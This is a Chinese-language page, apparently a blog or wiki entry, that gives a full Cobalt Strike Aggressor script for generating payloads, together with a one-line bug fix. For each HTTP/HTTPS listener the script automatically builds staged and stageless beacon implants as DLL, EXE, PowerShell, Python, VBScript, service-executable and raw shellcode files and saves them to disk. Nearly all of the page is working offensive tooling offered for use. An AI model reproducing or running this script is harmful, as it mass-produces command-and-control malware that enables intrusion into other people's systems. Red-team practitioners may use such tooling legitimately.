ArtifactPayloadGenerator.cna脚本bug修复

1
#Automatic Artifact Payload Generator
2
#Author: @r3dQu1nn
3
#更新:修复如果监听器名字没有http或https会生成失败的bug顺便汉化了一下 --by:WBG
4
#Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener
5
​
6
#Custom Directory for Payloads
7
mkdir("/opt/cobaltstrike/Staged_Payloads");
8
mkdir("/opt/cobaltstrike/Stageless_Payloads");
9
​
10
menubar("生成Payload", "payloadgenerator", 2);
11
popup payloadgenerator {
12
    item "&有效载荷生成器" {
13
        prompt_confirm("你想生成不同类型的Payload吗？", "Payload Generator Confirmation", {
14
            show_message("正在生成Payload...");
15
            payloadgenerate();
16
        });
17
    }
18
}
19
​
20
sub payloadgenerate {
21
    foreach $name (listeners_local()) {
22
    $original_listener = $name;
23
​
24
        $listener_name = listener_info($name);
25
        if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
26
            #Staged Payloads
27
            $data = artifact($original_listener, "dll");
28
            $data1 = artifact($original_listener, "dllx64");
29
            $data2 = artifact($original_listener, "exe");
30
            $data3 = artifact($original_listener, "powershell");
31
            $data4 = artifact($original_listener, "python");
32
            $data5 = artifact($original_listener, "svcexe");
33
            $data6 = artifact($original_listener, "vbscript");
34
​
35
            #Write and Save Payloads
36
            $handle = openf(">/opt/cobaltstrike/Staged_Payloads/dllpayload.dll");
37
        writeb($handle, $data);
38
        closef($handle);
39
        $handle1 = openf(">/opt/cobaltstrike/Staged_Payloads/dllx64payload.dll");
40
        writeb($handle1, $data1);
41
        closef($handle1);
42
        $handle2 = openf(">/opt/cobaltstrike/Staged_Payloads/exepayload.exe");
43
        writeb($handle2, $data2);
44
        closef($handle2);
45
        $handle3 = openf(">/opt/cobaltstrike/Staged_Payloads/powershellpayload.ps1");
46
        writeb($handle3, $data3);
47
        closef($handle3);
48
        $handle4 = openf(">/opt/cobaltstrike/Staged_Payloads/pythonpayload.py");
49
        writeb($handle4, $data4);
50
        closef($handle4);
51
        $handle5 = openf(">/opt/cobaltstrike/Staged_Payloads/svcexepayload.exe");
52
        writeb($handle5, $data5);
53
        closef($handle5);
54
        $handle6 = openf(">/opt/cobaltstrike/Staged_Payloads/vbspayload.vbs");
55
        writeb($handle6, $data6);
56
        closef($handle6);
57
​
58
        #Stageless Payloads
59
        artifact_stageless($original_listener, "dll", "x86", "", &dll);
60
            artifact_stageless($original_listener, "dllx64", "x86", "", &dllx64);
61
            artifact_stageless($original_listener, "exe", "x86", "", &exe);
62
            artifact_stageless($original_listener, "powershell", "x86", "", &ps1);
63
            artifact_stageless($original_listener, "raw", "x86", "", &raw);
64
            artifact_stageless($original_listener, "svcexe", "x86", "", &svcexe);
65
​
66
        }
67
        else{
68
            show_message("没有找到http或https监听器");
69
        }
70
    }            
71
}
72
​
73
sub dll {
74
​
75
    #Write and Save Payload
76
    local('$cradle');
77
    $cradle = openf(">/opt/cobaltstrike/Stageless_Payloads/dllpayload.dll");
78
    writeb($cradle, $1);
79
    closef($cradle);
80
​
81
}
82
​
83
sub dllx64 {
84
​
85
    #Write and Save Payload
86
    local('$cradle1');
87
    $cradle1 = openf(">/opt/cobaltstrike/Stageless_Payloads/dllx64payload.dll");
88
    writeb($cradle1, $1);
89
    closef($cradle1);
90
​
91
}
92
​
93
sub exe {
94
​
95
    #Write and Save Payload
96
    local('$cradle2');
97
    $cradle2 = openf(">/opt/cobaltstrike/Stageless_Payloads/exepayload.exe");
98
    writeb($cradle2, $1);
99
    closef($cradle2);
100
​
101
}
102
​
103
sub ps1 {
104
​
105
    #Write and Save Payload
106
    local('$cradle3');
107
    $cradle3 = openf(">/opt/cobaltstrike/Stageless_Payloads/powershellpayload.ps1");
108
    writeb($cradle3, $1);
109
    closef($cradle3);
110
​
111
}
112
​
113
sub raw {
114
​
115
    #Write and Save Payload
116
    local('$cradle4');
117
    $cradle4 = openf(">/opt/cobaltstrike/Stageless_Payloads/rawpayload.bin");
118
    writeb($cradle4, $1);
119
    closef($cradle4);
120
​
121
}
122
​
123
sub svcexe {
124
​
125
    #Write and Save Payload
126
    local('$cradle5');
127
    $cradle5 = openf(">/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe");
128
    writeb($cradle5, $1);
129
    closef($cradle5);
130
    if (-exists "/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe") {
131
        show_message("已生成并保存所有分阶段和无阶段有效负载。");
132
        show_message("保存在 /opt/cobaltstrike/Staged_Payloads/ \n /opt/cobaltstrike/Stageless_Payloads/ ");
133
    }
134
}
Copied!
源脚本
1
$listener_name = lc($name);
Copied!
修改为
1
$listener_name = listener_info($name);
Copied!
这里的bug是如果新建的监听器名字不含有http或https就会创建失败因为原先是靠监听器名字判断是否有http或https类型的监听器而修改后则是直接获取了监听器的类型不在靠用户命名这种不准确的东西了
以前
aggressor-script文档翻译
下一个
COM劫持利用脚本编写
最近更新 1yr ago
复制链接